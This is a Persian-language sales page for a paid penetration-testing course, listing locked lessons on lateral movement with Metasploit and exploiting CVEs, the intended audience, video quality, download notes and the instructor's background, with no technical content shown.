محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
آموزش دستورات Lateral movement با متاسپلویت

Lateral movement با متاسپلویت

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
کار با چند تا CVE

اکسپلویت چند CVE

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.

این دوره برای چه کسانی مناسب هست ؟

  1. دانشجویان رشته های کامپیوتر
  2. افرادی که قصد ورود به حوزه هک و امنیت را دارند
  3. مدیران سیستم و مدیران شبکه
  4. تحلیلگر ریسک/تهدید/آسیب پذیری
  5. مشاور امنیت فناوری اطلاعات
  6. پنتستر‌ها

 

کیفیت ویدیوها چطور هست ؟

تمام ویدیو ها با کیفیت Full HD و صدای با کیفیت همانند ویدیو معرفی دوره می باشد !

 

کانال اخبار دوره های سایت : رفتن به کانال تلگرام!

نکته : پس از تهیه دوره از پسورد گذاشته شده در لینک های دانلود اقدام به استخراج کنید.

نکته : این دوره در صورت آپدیت تمامی ویدئوهای جدید برای دانشجویان پیشین دوره کاملا رایگان است.

نکته : اگر سوالی دارید میتوانید برای ما کامنت گذاشته و یا از قسمت تماس با ما با ایمیل مدیر با ما ارتباط برقرار کنید.

 

دوره کالی لینوکس – کاملترین دوره آموزشی PWK کلیک کنید !

مدرسان دوره

سجاد تیموری

مهندس سجاد تیموری بیش از 8 سال است که به عنوان کارشناس ارشد تست نفوذ و مدرس در حوزه هک و امنیت فعالیت می‌کند. از جمله فعالیت‌های ایشان می‌توان به همکاری در چندین پروژه مختلف با پلیس فتا و دیگر پروژ ه‌های دولتی اشاره کرد.

نظرات

سوالات و نظراتتون رو با ما به اشتراک بذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

محصولات مشابه

   همین الان ثبت نام کن